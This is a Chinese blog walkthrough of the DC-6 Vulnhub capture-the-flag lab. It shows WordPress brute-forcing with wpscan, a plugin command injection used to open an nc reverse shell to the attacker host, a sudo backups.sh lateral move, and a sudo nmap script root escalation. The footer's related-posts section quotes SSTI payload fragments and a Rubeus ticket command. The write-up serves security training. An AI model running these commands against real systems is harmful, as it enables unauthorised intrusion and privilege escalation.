【DC6靶场通关详细记录】

已于 2023-12-20 00:22:27 修改
阅读量1k 收藏 28
点赞数 21
分类专栏: DC靶场通关记录系列 文章标签: 网络安全 笔记 经验分享 计算机网络 web安全
于 2023-12-19 23:57:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46678448/article/details/135090797
版权

环境搭建

  1. DC6靶场官网下载,点击下载DC6靶场https://www.five86.com/downloads/DC-6.zip
  2. 直接虚拟机导入DC6靶场即可,如果报错直接点击重试;
  3. 设置kali于DC6靶场的网络连接为统一方式;
  4. 同时说明一下DC6靶场,只有一个flag。

信息收集

扫描确定IP

使用arp-scan扫描网络,确定靶机IP,使用以下命令

arp-scan -l

image.png

扫描端口以及服务

使用nmap对靶机进行扫描,确定开启的端口,以及端口对应的服务,使用以下命令

nmap -sV -sC -p- -A 192.168.223.134

image.png
尝试访问后,访问不到web页面,url地址转换到http://wordy/
将IP和网址加入host文件进行解析,host文件写入以下语句

192.168.223.134 wordy

指纹识别

尝试访问靶机开放的端口80,是一个网站,可以尝试对靶机进行指纹识别,使用以下命令

whatweb -v 192.168.223.134

image.png

目录爆破

靶机上搭建了一个网站,尝试进行目录爆破,使用一下命令

dirsearch -u 192.168.223.134
dirsearch需要安装
apt-get install dirsearch

image.png

密码破解

使用工具wpscan

  1. 由信息收集的内容,网站使用wordpress搭建
  2. 使用专门的对wordpress进行扫描的工具wpsacn进行扫描

用户枚举

  1. 使用wpscan进行网站用户枚举,使用以下命令

wpscan --url http://wordy/ --enumerate u

image.png

  1. 将用户名保存在文件中,接下来爆破密码会使用

密码破解

  1. 获取密码字典,根据以下提示获取密码字典,官方提示使用以下命令获取字典
  1. cat /usr/share/wordlists/rockyou.txt | grep k01 >/root/pass.txt
  1. 使用wpscan进行网站密码爆破,使用以下命令

wpscan --url http://wordy/ -P pass.txt -U user

image.png
获得有效用户名和密码

mark : helpdesk01

获取shell

网站页面查找漏洞

  1. 通过爆破出来的用户名密码登陆网站

  2. 在网站插件处找到可能存在漏洞利用的点,具体位置如下图
    image.png

  3. 此处功能点可以执行命令,尝试执行命令有回显
    image.png

获取webshell

  1. 利用此处命令执行漏洞,尝试执行反弹shell

kali开启监听: nc -lvp 8888
网站命令执行:nc 192.168.223.129 8888 -e /bin/bash
点击按钮后获得webshell

另一种获得shell的方法

  1. 根据网站页面内容Activity monitor,尝试搜索漏洞
    image.png

  2. 尝试kali搜索漏洞

searchsploit activity
searchsploit -m 50110.py

image.png

  1. 利用脚本获取shell(不稳定),推荐使用使用nc获取shell
    image.png

尝试提权

  1. 尝试sudo提权,无法提权

sudo -l

  1. 尝试suid提权,无法提权

find / -perm -u=s -type f 2>/dev/null

image.png

  1. 尝试计划任务提权,无法提权

cat /etc/crontab

提权

尝试登录ssh

  1. 查看目录、文件,在文件中查看到一个文件提示新增加一个用户,后面的内容应该是用户名密码
    image.png

  2. 通过获得的新用户名密码,尝试登陆ssh
    image.png

ssh尝试提权

  1. 尝试sudo提权,有一个其他用户权限的文件

sudo -l

image.png

  1. 尝试文件中写入/bin/bash,并执行该文件,获取另一用户的权限
  1. echo ‘/bin/bash’ >> backups.sh
  2. sudo -u jens /home/jens/backups.sh

image.png

nmap提权

  1. 在获取到的新用户shell下,尝试sudo提权

sudo -l

image.png

  1. 查找nmap提权方法

image.png

  1. 通过提权,获得root权限

TF=$(mktemp)
echo ‘os.execute(“/bin/sh”)’ > $TF

sudo nmap --script=$TF

image.png
没有命令回显,需要输入命令回车后才显示命令,同时使用python开启交互终端,命令如下

python -c ‘import pty;pty.spawn(“/bin/bash”)’

flag

  1. 使用python开启交互式的终端后,查看权限和flag(此处无截图 😂又忘截图了下次一定)

whoami
ls
cat theflag.txt

总结

  1. wordpress建站系统在kali中有专门的扫描器wpscan
  2. 命令执行漏洞利用方法:直接反弹shell
  3. 当一个webshell中无法提权时,尝试更换shell或ssh获取其他用户的shell进行提权操作
  4. sudo的nmap提权操作
TF=$(mktemp)
echo 'os.execute("/bin/sh")'  > $TF
sudo nmap   --script=$TF
榕小树
关注
  • 21
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
DC-6靶场
qq_49518993的博客
08-31 1205
DC-6靶场
Vulnhub DC-6靶场
weixin_47019868的博客
11-21 508
Vulnhub DC-6靶场
DC-6靶场实战
qq_42754807的博客
03-26 1004
DC-6靶场实战
DC-6通关教程
m0_74402888的博客
04-25 894
原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root。发现了jens用户的无密码命令执行文件backup.sh,也就是以jens的身份横向命令执行,接着我们来看一下该文件。根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典。sudo -l 命令用于列出当前用户可通过 sudo(SuperUser DO)命令执行的所有命令的权限。
DC-6 靶场演练
猎荒者
03-04 752
Stand Out Fit In 环境准备 Kali Linux(IP:10.10.16.128) DC-6 靶机 NAT 网络连接 主机发现 端口扫描 目录爆破 漏洞挖掘 漏洞利用 ...
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
DC DC电路原理的详细资料简介-综合文档
05-22
**DC/DC转换器原理详解** DC/DC电路,全称直流-直流转换器,是一种用于将一个直流电压转换为另一个不同电压等级的电路。在电子工程领域,它扮演着至...这份详细的资料简介为学习和研究DC/DC电路提供了宝贵的基础知识。
6-A DC-DC Buck Converter Selection Guide of Mid-range.pdf
10-30
DC-DC降压转换器选择指南 DC-DC降压转换器是一种常用的电源管理器件,能够将高电压降低到低电压...本应用笔记旨在帮助用户更好地选择TI的DC-DC降压转换器产品,以满足中等输入电压和6 A输出步骤降压DC-DC应用的需求。
vulnhub靶场,DC-6
kukudeshuo的博客
07-14 473
vulnhub靶场,DC-6 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-6(192.168.58.149) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.149 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机80端口 发现输入的IP自动跳转到了一个域名,说明域名重定向了,进入配置文件
DC-6靶场练习
weixin_52985767的博客
12-27 400
DC-6靶场复现
DC6靶场练习
qq_60848021的博客
06-27 117
有2点需要注意:一,需要编辑hosts文件才能访问网站;二,给了一条线索,是一个密码文件。
Vulnhub靶场----6、DC-6
七天
02-24 807
Vulnhub-DC6
DC-6 vulnhub靶场
weixin_62621015的博客
02-27 130
DC-6 vulnhub靶场个人通关记录
靶场练习第十四天~vulnhub靶场之dc-6
qq_57976347的博客
02-13 523
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接: 百度网盘 请输入提取码 提取码: bazx 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip 命令:sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -sV -p- 192.168.101.119 (2)看看详细信息 nmap -A -p- 192.168.101.119
【DC-6靶场渗透】
一纸荒芜的博客
01-16 1212
DC6靶场渗透
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限,你可以使用SSTI有效载荷发生器来执行特定类型的Java SSTI攻击。该有效载荷发生器可以生成针对Java SSTI的payload,启发于${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)...}。 4. 另外,你还可以使用Rubeus工具来申请访问自身的可转发服务票据。通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击中使用。 通过以上步骤,你可以成功通关ssti-lab靶场。请注意,在进行任何攻击前,确保你有合法的授权和使用权,并且遵守法律法规。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [WP-春秋云镜-Brute4Road靶场通关完全指南](https://blog.csdn.net/qq_45234543/article/details/128482984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [ssti-payload:SSTI有效载荷生成器](https://download.csdn.net/download/weixin_42128558/15099898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榕小树

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值